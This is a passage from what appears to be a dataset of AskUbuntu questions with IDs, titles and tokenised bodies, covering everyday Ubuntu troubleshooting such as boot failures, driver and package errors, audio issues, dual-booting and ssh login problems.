down to start over , as far as i know . after a hard power down for the second time , i booted in ubuntu recovery mode and then resumed normal boot from there . this time , i did see the background and could summon the terminal , but unity seems to be missing and therefore it still was n't usable . still does n't answer why i ca n't boot normally , either . i have since reinstalled ubuntu from the live cd ( i can run ubuntu from the live cd as well , but it is painfully slow for obvious reasons ) . same issues . sorry for the lengthy post , just trying to include as much info as possible . in case i get tagged for lacking clarity in my question , i will make it clear that i just want to ubuntu to run smoothly and i do n't know how to do that with these issues . i also do n't know if my lack of internet connection is a contributing factor . i am fairly new to ubuntu , but have been successfully using it in dual-boot on my much newer/nicer laptop . edit : i see it has been marked as duplicate , but i had tried the solutions in that question before asking this question . i 'm sorry for not pointing that out . hopefully , my question has n't been filed away into oblivion for being similar to that other one .
315247	commercial drivers install fails	upon trying to install `` software modem '' or the `` smartlink modem daemon '' a proprietary driver , i get the error `` systemerror : e : unable to correct problems , you have held broken packages . '' is their anyway to fix this ?
315255	how do you enable a wireless driver using the terminal ?	i do n't have internet access , i have a dell inspiron 3520 with ar9485 wireless network ( atheros ) adaptor ( rev01 ) , on a previous version of ubuntu it worked fine , when i re-installed ubuntu , i think it turned the driver off , my internet tray is completely empty of choices , how do i enable my wireless driver via the terminal ? or should i reinstall ?
315260	plugin reporting for cacti 0.8.8a	i need to report top ten of cpu , memory , disk and interface bandwidth . at least , i can get import the value of them . what is the plugin should i install ? thanks , tisna
315261	are there any achievement and leaderboard services for gamers and game developers ?	are there any achievement and leaderboard services for ubuntu like xbox live ? also would it be open for game developers of any kind ?
315262	dist-upgrade runs and completes but current kernel stays the same	i think that my system is staying at an older kernel version . it seems to update when i run dist-upgrade but the current kernel version does n't change . is it possible the system is set to install new kernel updates but only load an older version at start up ? $ uname -a linux htpc 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:32:50 utc 2012 i686 athlon i386 gnu/linux $ dpkg -- list | grep linux-image ii linux-image-3.2.0-32-generic 3.2.0-32.51 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-32-generic-pae 3.2.0-32.51 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-32-virtual 3.2.0-32.51 linux kernel image for version 3.2.0 on 32 bit x86 virtual guests dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d' linux-headers-3.2.0-36 linux-headers-3.2.0-36-generic-pae linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic-pae linux-headers-3.2.0-38 linux-headers-3.2.0-38-generic-pae linux-headers-3.2.0-39 linux-headers-3.2.0-39-generic-pae linux-headers-3.2.0-40 linux-headers-3.2.0-40-generic-pae linux-headers-3.2.0-41 linux-headers-3.2.0-41-generic-pae linux-headers-3.2.0-43 linux-headers-3.2.0-43-generic-pae linux-headers-3.2.0-44 linux-headers-3.2.0-44-generic-pae linux-headers-3.2.0-45 linux-headers-3.2.0-45-generic-pae linux-headers-3.2.0-48 linux-headers-3.2.0-48-generic-pae update 7/1/13 11:43 $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic found memtest86+ image : /memtest86+.bin done
315265	unable to set the shortcut for `` switch applications ''	i tried to change the shortcut for `` switch applications '' in settings- > keyboard- > shortcuts , but it does not work . the ui simply lies .
315268	update manager partitions	perhaps this is completely stupid , but here 's my inquiry : i have ubuntu 12.04 installed on an external hard drive . on that hd there are 4 partitions . two for operating systems , two for swap ( unnecessary but i like it that way ) . the actual computer itself has windows 7 . if i use the update manager to update to 12.10 or even 13.04 , would the new ubuntu install itself on the same partition it already was on ? the other operating system i 'm running on the hard drive is lubuntu , for when i need to run linux on older computers , if that matters . thanks , adam
315270	my terminal and the aperture science logo	i was wondering if it was at all possible to totally revamp my terminal . i want to put the portal ii aperture science logo in my terminal and have it stay there as if it is a mascot ( or something ) . here is the text link if anyone is curious : http : //jamisonjudd.com/2010/06/06/aperture-science-logo-in-text/ i am running an x86 - 13.04 just in case that info might help , thank you in advance : )
315271	ubuntu server 11.04 update 404 errors	i am an ubuntu amateur trying to set up an ubuntu 11.04 server on a tower . i want to install things like ssh client/ server and gksudo on it but i get errors when trying to do so . i tried to update , but i get 404 errors . i have already tried to install fix404 but it seems there is no `` app-add '' command ... after many hours of failure , i turn to you , wise people of the internet . you are my last hope . help ?
315272	ubuntu 12.04 freezes during boot	i installed ubuntu using the windows installer ( wubi ) . when i start my computer and select ubuntu , my screen goes black and i see a blinking cursor at the top left of the screen . i have waited an hour , but nothing happens . i have tried restarting the computer multiple times , but the same thing always happens . windows works fine though . i am trying to use ubuntu 12.04 lts . i also tried to install ubuntu using a usb drive , but it would hang during the initial start-up . it would print `` voltage table 0x50 unknown '' and freeze . can anyone tell me what i am doing wrong ? i need ubuntu for work .
315273	having problems installing flash player	hey guys when i tried to install the flash player from the terminal i got this error : the following packages have unmet dependencies : flashplugin-installer : depends : libnss3-1d but it is not going to be installed depends : libnspr4-0d but it is not going to be installe i 'm not sure how to fix this , so i could use your help.i also had an error installing it from the ubuntu software center .
315275	apt-get -f install	i 'm trying to apt-get -f install on my ubuntu 12.04 server . i get the following error message : after this operation , 157 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 122731 files and directories currently installed . ) unpacking linux-image-3.5.0-34-generic ( from ... /linux-image-3.5.0-34-generic_3.5.0-34.55~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-34-generic_3.5.0-34.55~precise1_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.5.0-34-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-34-generic /boot/vmlinuz-3.5.0-34-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-34-generic /boot/vmlinuz-3.5.0-34-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-34-generic_3.5.0-34.55~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) my primary disk is n't full - however , my boot partition is only ~100mb . is apt-get trying to install stuff to /boot ? it does mention trying to do something to ./boot/vmlinux [ ... ] i get a longer but eventually similar error trying to apt-get -f upgrade as well . what 's going on ? uname -r yields simply 3.5.0-31-generic dpkg -l | grep linux-imageyields this : ii linux-image-3.5.0-28-generic 3.5.0-28.48~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-3.5.0-30-generic 3.5.0-30.51~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-3.5.0-31-generic 3.5.0-31.52~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp iu linux-image-generic-lts-quantal 3.5.0.32.39 generic linux kernel image which i 'm guessing means i have a certain number of kernels that i could purge ? but when i try to apt-get purge , it asks me to run apt-get -f install because of an unmet dependency ... and yeah , i checked disk space and /dev/sda ( which is /boot/ ) is 100 % full . this install has been running ~40 days total , and has been booted once ( today ) i i did some research before deciding on a /boot size , and 100mb seemed to be a pretty reasonable size . what 's going on ? i tried running apt-get clean , autoclean , autoremove , and manually purging a given kernel . i keep getting linux-image-generic-lts-quantal : depends : linux-image-3.5.0-32-generic but it is not installed e : unmet dependencies . try using -f .
315276	ubuntu shows that i 'm in offline mode while trying to connect to internet	i have lenovo z580 laptop and dual-booted my system with windows 8 and ubuntu 13.04 . i can connect to internet using windows 8 ( both wired & wireless ) but can not connect using ubuntu ( both ) . it always shows me that `` i am in offline mode ''
315278	ubuntu 12.10 internal error : evolution-calendar-factory	my ubuntu keep prompting this : sorry , ubuntu has experienced an internal error . and the messages are : executablepath /usr/lib/evolution/evolution-calendar-factory package evolution-data-server 3.6.0-0ubuntu2 problemtype crash title evolution-calendar-factory crashed with sigfpe in g_cclosure_marshal_void_objectv ( ) i am running ubuntu 12.10 on my i3-3220 3.8gb memory any suggestions ? please . i do n't know why that happens..
315281	trying to install ubuntu on partitioned hd	i have a samsung 1tb hd partitioned into 4 primary partions . i want to use : partition 1 for win xp partition 2 for win vista partition 3 for ubuntu partition 4 for kubuntu . i have partitioned the drive while trying to install ubuntu . no os is yet installed . i decide to start with ubuntu because i know i can use ubuntu to partition the drive . so after the partitioning ( all 4 drives are ext4 and 250gb each ) , i set the mount point for partition 3 to'/ ' but no mount point to any of the other partitions . boot loader ( devive for boot loader installation ) is set to '/dev/sdf ata samsung hd 103uj ' ( 1.0 tb ) . when i click 'install now ' i get the warning message : 'no mount point is assigned for the ext4 file system in partition # 1 of scsi7 ( 0,0,0 ) ( sdf ) ' so what ams i doing wrong ? any help is appreciated . thanks , tom .
315282	crackling sound from microphone recently , in 13.04	i use 13.04 since the release and i use skype which was working well . but recently i 've had remarks saying my voice was `` crackling '' , even if the voice from my interlocutor was perfect . making a test with audacity and cheese , i 've seen that every recorded sound ( with the front microphone of my laptop or a jack microphone ) was crackling . it 's not really like saturating , the sound has a lot of annoying pops . i 've tried to check the settings , they were still on pulseaudio . i 've even tried the extreme solution : re-installing ubuntu ( because initially it was working ) âś with the same problem . if i boot on windows ( dual-boot ) i have no problem ( so it 's not physical ) . if anyone could help : ) my laptop is a hp dv6-6165sf . the sound card is a `` idt 92hd81b1x5 '' ( with beatsaudio ) . thanks a lot ! new tests - july 6th hi again , i 've tried editing /etc/pulse/default.pa with these three settings : load-module module-udev-detect use_ucm=0 tsched=0 load-module module-udev-detect tsched=0 load-module module-udev-detect use_ucm=0 the three of them do n't change anything , except the last one ( which was by default ) which makes audacity record without any crackling sound . but in skype , cheese and kazam , the sound is cracklingâś i 've installed again ubuntu 13.04 ( from scratch , deleting everything from /home ) , and i 've updated it . the microphone is still cracking . thanks for your help !
315284	does the freequent use of cat command badly affect the hard disk performance ?	one the programs i 've written requires merging many files into one , every 3 seconds . the merged file can be bigger than 1gb . i 'm using cat command to do this . cat seems to work pretty fast even when merging large files , but i do n't know how it works internally . i 'm worried whether iteration of cat command will badly slow down the hard disk , at program runtime .
315290	what actually happen when i connect an external display to ubuntu pc	i know that ubuntu treats an external device as an file , for eg . when i connect an external webcam to my pc , a file named as video1 creates under my dev directory . i just want to know that does ubuntu handles external display the same way and how we can configure/select from multiple displays connected to a pc .
315291	how do i share my mobile internet connection in ubuntu 13.04 ?	i 've a blackberry that i connect to the internet through barry application , can this connection be shared somehow ? i use a old laptop that do n't have a build in wifi . i ca n't use a wifi usb adapter as there are n't support for netgear wna3100 device .
315292	how to restart banshee after crash ?	if banshee crashes the sound/audio system menu still shows it as available but nothing happens if i click on it . with ps i can see a defunct banshee process that can not be removed . if i try to run banshee from the command line nothing happens . restarting gdm and/or unity also has no effect . as far as i can tell there is now no way to start banshee short of rebooting which is annoying . does anyone know how i can start banshee without closing everything down and rebooting ? perhaps there is some part of ubuntu that controls the sound menu and i can restart that ? i was hoping it was part of gdm or unity but restarting them did n't help . ps output is : john @ w530 $ ps -fp 20469 uid pid ppid c stime tty time cmd john 20469 1 0 jul01 ? 00:04:29 [ banshee ] < defunct >
315296	how to get the revision history of a branch with bzrlib	i 'm trying to get a list of committers to a bzr branch . i know i can get it through the command line with something along these lines : bzr log -n0 | grep committer | sed -e 's/^ [ [ : space : ] ] *committer : // ' | uniq however , i 'd like to get that list programmatically with bzrlib . after having looked at the bzrlib documentation , i ca n't manage to find out how i would even get the full list of revisions from my branch . any hints on how to get the full history of revisions from a branch with bzrlib , or ultimately , the list of committers ?
315297	installing 13.04 on an efi partition - share with windows 8 ?	information i 've found here suggests that for my system , i need to install 13.04 into an efi-type partition , since it needs to boot as uefi . i also understand it is advisable to have only one efi partition on the disk ; i 've read here that it is ok for ubuntu and windows to share the same partition ( please confirm ) . when i try to install into the existing efi drive , i get the message `` no root file system is defined . please correct from partitioning menu . '' do i change the efi boot partition to another type ? does n't that defeat the purpose ? if i change it to ext4 journaling file system , i am given the opportunity to define the '/ ' mount point . i have n't proceeded beyond this point for fear i am going to destroy windows 8 by altering this partition . btw , i created three partitions in windows before installing , per the helpful response to my previous question . but if i try to install into the partition i created for ubuntu , i get the `` no root file system ... '' error again . i have read this question/answer several times over : installing ubuntu on a pre-installed uefi supported windows 8 system much of that answer talks about dealing with secure boot - i have already figured out how to disable secure boot , so according to that answer `` there is no problem '' there . if i understand correctly , i want to stay in uefi with secure boot disabled . there is already have an efi partition , and when i try to install ubuntu into that efi partition i get the error message `` no root file system is defined . please correct from partitioning menu . '' this is my question - and i may be missing something , but i do n't see how the question/answer i duplicated helps me with that problem .
315302	creating domain in ubuntu server 12.10	i install ubuntu server 12.10 , i want to implement a domain on this server . how can i implement domain ? i read the document of samba but i think this can not solve my problem .
315308	problems with audio in ubuntu 12.10	after installing updates and rebooting , i have some problems with 64 bit ubuntu 12.10 running kernel version 3.5.0-34-generic . the most obvious problem is that audio does not work but there are other problems such as the reboot menu on the ubuntu ( unity ? ) login screen does not work ( i can click on it and a very small empty popup window appears ) and when rebooting , the machine gets stuck in the shutdown screen ( i 'm using the xubuntu-desktop package , so the shutdown screen says `` xubuntu '' ) . logging into xubuntu works fine except for the missing sound . when logging into unity , the system menu at the top right has the same problem as on the login screen ( empty , very small ) . the output of dmesg contains notes on found audio hardware ( see blow ) and hwinfo -- sound also gives me information about found hardware but also contains an error message ( see below ) . where to look next to pin the problem down and find a resolution ? thanks ! relevant dmesg output . [ 13.067650 ] hda-intel : 0000:01:00.1 : handle vga-switcheroo audio client ... [ 13.952341 ] input : hda nvidia hdmi/dp , pcm=9 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input9 [ 13.952459 ] input : hda nvidia hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input10 [ 13.952562 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input11 [ 13.952659 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input12 output of hwinfo -- sound . $ hwinfo -- sound > hal.1 : read hal dataprocess 2669 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 14 : pci 1b.0 : 0403 audio device [ created at pci.318 ] unique id : u1nb.59ewijiira0 sysfs id : /devices/pci0000:00/0000:00:1b.0 sysfs busid : 0000:00:1b.0 hardware class : sound model : `` intel audio device '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x1c20 subvendor : pci 0x1028 `` dell '' subdevice : pci 0x0498 revision : 0x04 driver : `` snd_hda_intel '' driver modules : `` snd_hda_intel '' memory range : 0xd8b60000-0xd8b63fff ( rw , non-prefetchable ) irq : 45 ( 245 events ) module alias : `` pci : v00008086d00001c20sv00001028sd00000498bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown 23 : pci 100.1 : 0403 audio device [ created at pci.318 ] unique id : nxns.ukala87mfx5 parent id : vskl.xbhhilllvg6 sysfs id : /devices/pci0000:00/0000:00:01.0/0000:01:00.1 sysfs busid : 0000:01:00.1 hardware class : sound model : `` nvidia audio device '' vendor : pci 0x10de `` nvidia corporation '' device : pci 0x0be3 subvendor : pci 0x10de `` nvidia corporation '' subdevice : pci 0x0862 revision : 0xa1 driver : `` snd_hda_intel '' driver modules : `` snd_hda_intel '' memory range : 0xd8080000-0xd8083fff ( rw , non-prefetchable ) irq : 17 ( 7644 events ) module alias : `` pci : v000010ded00000be3sv000010desd00000862bc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 9 ( pci bridge )
315315	upgrading to ubuntu 13.04	i have installed ubuntu 10 using a windows installer and then upgraded to 12 , recently . i got to hear about the experiences of others of the 13.04 and was eager to upgrade and somehow that was n't possible so wanted to check if there is any procedure which i overlooked . i have netbook atom processor n450 @ 1.66 ghz , 512 kb cache , 1 gb memory .
315316	ca n't play balazar game	i am not able to play balazar game in ubuntu 12.04 . i am able to play it when i run it using terminal disabling the sound like this : balazar -- no-sound is there any way to play it ? thank you .
315317	duplicate sources error while updating	i am a beginner with ubuntu and any help is appreciated . when i run sudo apt-get update on ubuntu 12.04 lts i obtain at the end the following message : reading package lists ... done w : duplicate sources.list entry cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.2 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130213 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.2 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130213 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems output of sources.list : deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //it.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //it.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //it.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //it.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //it.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //it.archive.ubuntu.com/ubuntu/ precise universe deb http : //it.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //it.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //it.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //it.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //it.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //it.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //it.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //it.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main
315323	looking for software that will compress , encrypt , split , and upload data for backups to multiple clouds	as the title says , i 'm looking for ubuntu friendly software that will compress , encrypt , split , and upload data for backups across multiple clouds . i have grabbed multiple cloud accounts for free ranging from 2gb to 50gb in size and i 'd like to backup my data encrypted to those clouds . some of these accounts includ dropbox , box.net , microsoft skydrive , google drive , and others . all of my systems are running ubuntu 13.04 raring . any ideas ?
315325	boot problem , neither ubuntu nor windows boots	i bought a new laptop with windows 8 pre-installed and i tried to make it dual boot like my windows vista laptop with ubuntu . turns out because of some boot sector changes its really complicated now ! ubuntu installed fine , but it would n't boot up windows anymore . after reading a new threads on here about people with the same problem , i installed and ran the boot repair software ( https : //help.ubuntu.com/community/boot-repair ) after going through the instructions , i rebooted my computer and it gave me a `` grub rescue '' screen saying error : invalid arch independent elf magic . grub rescue > i am running ubuntu from the live cd now ... and have tried to fix that problem by running sudo mount /dev/sda1 /mnt sudo grub-install -- root-directory=/mnt /dev/sda this ended up booting in the `` grub '' window where it allows me to type some rudimentary commands . can anyone help me fix my computer and get back to 1 . ubuntu booting up ! 2 . dual boot with my windows which is still installed here is the pastebin that boot-repair gave me to write down after the installation : http : //paste.ubuntu.com/5835513
315326	photshop digital painting on wine	i have ubuntu 13.04 , and downloaded the latest version of wine , installed photoshop cs6 and cs5 and found that in both digital painting is impossible.. is there a good novice guide to download photoshop and wacom drivers.. all i could find are incredible complicated guides oh and does anybody have any experience with this.. will it be better for me just to have dual boot ?
315332	php interactive interpreter : delete and ctrl +aarrows keys do n't work properly	when running php interactive interpreter with : php -a delete button does n't work ( produces ~ instead ) , jumping over words with ctrl+left arrow and ctrl+right arrow does n't work either ( ; 5d and ; 5c , respectively ) . it annoys me a lot - i use php -a every day . worth noting , that other interpreters ( irb , ipython , etc . ) work good .
315335	bash command for each file in a folder	i have a set of files on which i would like to apply the same command and the output should contain the same name as the processed file but with a different extension . currently i am doing rename /my/data/andrew.doc to /my/data/andrew.txt i would like to do this for all the .doc files from the /my/data/ folder and to preserve the name . i tried several versions but i guess i have something wrong in the syntax as i an new to linux .
315337	how to reinstall ubuntu 13.04	i encountered a kernel panic error and i went to go load up livecd install i have on my sd card with ubuntu 13.04 on it , i choose to install ubuntu , however when i get to the options of what i want to do , the `` reinstall ubuntu 13.04 '' option is greyed out , leaving me with the other only option of installing along side the current ubuntu 13.04 install or delete all files and settings and install ubuntu 13.04 fresh . i 'm finding this really annoying because all i want to do is re-install system files and fix this kernel panic error , and keep all my files . how can i un-grey the `` reinstall ubuntu 13.04 '' option ? more about my kernel panic error , i was getting exitcode=0x00007f00 init was trying to be killed and caused the kernel panic error , because something decided to mess up , when everything was running perfectly fine until i went to go do a reboot after installing some updates which asked me to reboot afterwards .
315344	sed command replace text with ' character	i have an very big sql file that i cant open in a gui editor . i need to replace the string 'user1 ' @ 'localhost ' ( note the ` character ) by 'user2 ' @ 'localhost ' but i am having troubles finding the right syntax for sed command . i can get the strings to replace correcly using the following grep command : grep -w 'user1` @ `localhost' any help please ? thank you .
315347	clementine dark-light icons in unity tray	do not matter which icon set i use , ubuntu-mono-light or ubuntu-mono-dark , the clementine tray icon does not change . i have found that in both themes there is a icon called `` clementine-panel-grey.png '' but it is not used . any ideas ?
315348	how do i stop websites , opened in firefox , such as youtube and amazon from appearing seperately as an app on the launcher or dash ?	this just creates unnecessary clutter on my launcher .
315350	ubuntu 13.04 not detecting operating system windows 8	i have a samsung np740u3e with pre-installed windows 8 ( boots with uefi ) . i installed ubuntu 13.04 without problems . later , windows 8 did a bios update which messed up everything , nothing would boot . i recovered everything and went back to fabric settings . now windows 8 works fine , but when i try to install ubuntu it does not detect any operating system , so i can`t install ubuntu alongside windows . i`ve googled as much as i can , ran a boot-repair , disabled fast- and secure-boot . i have a gpt disc , been looking into gdisk without luck . here`s my boot-repair summary http : //paste.ubuntu.com/5835719/ is it necessary to convert the gpt disc to mbr ? is it possible to hard-reset the disc `` even more '' than fabric settings ? thanks in advance .
315353	font size problem in google chrome ?	the font size on many websites while using google chrome is so small whereas it looks fine in firefox . how can i fix this problem ? even on my windows xp computer font looks normal but google chrome on ubuntu definitely has some problem with fonts .
315355	installed ubuntu on a intel i5 3330 ( over a dh 77eb motherboard ) , networking fails	to my surprise network fails after ubuntu installs . modprobe e1000 , did not get networking to kick off modprobe e1000e , too did not load searched for the drivers on the intel site , no linux drivers listed . lspci reports 00:19.0 ethernet controller [ 0200 ] : intel corporation device [ 8086:1503 ] ( rev 04 ) any idea on how to proceed ? is there a place where i can map driver names ( like e1000 , e1000e ) with the model numbers ?
315358	script to email files content	i have created a shell script that takes backups everyday and emails its execution as successfull or unsuccessfull . now i want that it send the contents of log file it creates with the mail as well . i have seen how to send file as attachement but i want to send the contents of the file as email message and not the file . please help . its code is like # email settings message_success= '' database backup generated successfully '' message_failure= '' problem occured while generating database backup please verify '' subject= '' database backup status mail '' recipients= '' tarun @ gmail.com '' # verify backup created if [ -f `` $ path_mysql_dump '' ] ; then echo `` database backup created '' > > $ path_log_file echo `` $ message_success '' | mail -s `` $ subject '' `` $ recipients '' else echo `` database backup not created please verify the process will terminate '' > > $ path_log_file echo `` $ message_failure '' | mail -s `` $ subject '' `` $ recipients '' exit -1 fi
315361	change libcups to repository version	i upgraded my libcups package to 1.6 in hopes to fix something but i just buggered things up more . so i want to reinstall it to the version on the repository ( 1.5.3 i think ) . i 've tried to do a reinstall using ~ # : apt-get install -- reinstall libcups2 but that tells me it can not be downloaded so refuses to upgrade . i ca n't just do : ~ # : apt-get remove libcups2 ~ # : apt-get install libcups2 as that wants to remove 299 packages along with it . totaling 668mb so i am hesitant as that will probably take 6 hours to download on my connection .
315362	log incoming requests	we have tomcat running on ubuntu server . it runs a web service , open to the internet . sometimes it has sudden spike of traffic and goes down . there is nothing unusual in tomcat access logs . i guess because some of the requests are so 'heavy ' that they never finish and hence are not recorded to tomcat access logs . is there a way to configure ubuntu to log incoming requests in the following format ( below ) ? date , time , url ( with query string params ) , ip address ( of client ) there should be one line per request . each request should be logged before it is executed . only incoming requests to ports 80 and 443 should be logged .
315365	transmission torrent client very inconsistent speeds	i have inconsistent download speed using the transmission bit torrent client . the speed will vary greatly between 400kb and 1kb per second ( my internet is crap 400kb is a acceptable maximum ) . i also noticed that even though hundreds of peers are available transmission will only connect to about 20 at any time ( i have set the connection limit to 200 per torrent and 500 max ) . i hope someone know a fix .
315372	change language encoding for file uploading	previously we were running a wordpress site on a mac os server machine . we had several hundred images with chinese characters for the image names . now we 're trying to migrate to a ubuntu system and everything is fine except the images . every time i try to upload an image with a chinese name via ftp , i get the following message : `` myimage contains illegal characters . please choose an appropriate text encoding '' i have no idea how to solve this issue , do i need to somehow change the system language encoding in ubuntu to allow for chinese charactered image uploading ? thanks
315373	how to block cd/dvd drive in ubuntu ?	i have created 3 standard users in my system and i want to disable cd/dvd drive for them . how to do it ?
315377	ssh error : permission denied , please try again	i am new to ubuntu . hence please forgive me if the question is too simple . i have a ubuntu server setup using amazon ec2 instance . i need to connect my desktop ( which is also a ubuntu machine ) to the ubuntu server using ssh . i have installed open-ssh in ubuntu server . i need all systems of my network to connect the ubuntu server using ssh ( no need to connect through pem or pub keys ) . hence opened ssh port 22 for my static ip in security groups ( aws ) . my sshd-config file is : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes through webmin ( command shell ) , i have created a new user named 'senthil ' and added this new user to 'sudo ' group . sudo adduser -y senthil sudo adduser senthil sudo i tried to login using this new user 'senthil ' in 'webmin ' . i was able to login successfully . when i tried to connect ubuntu server from my terminal through ssh , ssh senthil @ server_ip it asked me to enter password . after the password entry , it displayed : permission denied 